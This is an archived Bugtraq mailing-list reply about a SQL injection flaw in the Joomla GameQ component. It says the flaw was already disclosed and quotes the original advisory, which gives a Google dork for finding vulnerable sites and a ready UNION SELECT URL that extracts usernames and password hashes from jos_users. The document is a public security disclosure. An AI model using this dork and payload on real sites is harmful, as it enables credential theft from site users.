Re: Joomla Component GameQ

To: r3d.w0rm@xxxxxxxxx
Subject: Re: Joomla Component GameQ
From: packet@xxxxxxxxxxxxxxxxxxxxxxx
Date: Thu, 4 Dec 2008 17:08:05 -0500
Cc: bugtraq@xxxxxxxxxxxxxxxxx
In-reply-to: <200812041520.mB4FKGGc010451@xxxxxxxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <200812041520.mB4FKGGc010451@xxxxxxxxxxxxxxxxxxxxxx>
User-agent: Mutt/1.5.17+20080114 (2008-01-14)

Already discovered:


http://packetstormsecurity.org/0806-exploits/joomlagameq-sql.txt 
6d9a99abd76c7d48c68ea5c98d952844 The Joomla GameQ component versions 4.0 and 
below suffer from a SQL injection vulnerability.  Authored By <a 
href="mailto:His0k4.hlm[at]gmail.com";>His0k4</a>


On Thu, Dec 04, 2008 at 08:20:16AM -0700, r3d.w0rm@xxxxxxxxx wrote:
> #####################################################################################
> ####                            Joomla Component GameQ                        
>    ####
> #####################################################################################
> #                                                                             
>       #
> #AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                          
>       #
> #Discovered by : Sina Yazdanmehr (R3d.W0rm)                                   
>       #
> #Our Site : Http://IRCRASH.COM                                                
>       #
> #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi 
>       #
> #####################################################################################
> #                                                                             
>       #
> #Download : http://joomlacode.org/gf/project/gameq                            
>       #
> #                                                                             
>       #
> #DORK : inurl:option=com_gameq                                                
>       #
> #                                                                             
>       #
> #####################################################################################
> #                                       [Bug]                                 
>       #
> #                                                                             
>       #
> #http://Site/[path]/index.php?option=com_gameq&task=page&category_id=-9999+union+select+0,1,2,3,4,5,username,password,8,9,10,11,12,13+from+jos_users/*
> #                                                                             
>       #
> #####################################################################################
> #                           Site : Http://IRCRASH.COM                         
>       #
> ###################################### TNX GOD 
> ######################################

References:
- Joomla Component GameQ
  - From: r3d . w0rm

Prev by Date: iDefense Security Advisory 12.04.08: Sun Java JRE Pack200 Decompression Integer Overflow Vulnerability
Next by Date: [ MDVSA-2008:237 ] apache2
Previous by thread: Joomla Component GameQ
Next by thread: Advisory 06/2008: PHP ZipArchive::extractTo() Directory Traversal Vulnerability
Index(es):
- Date
- Thread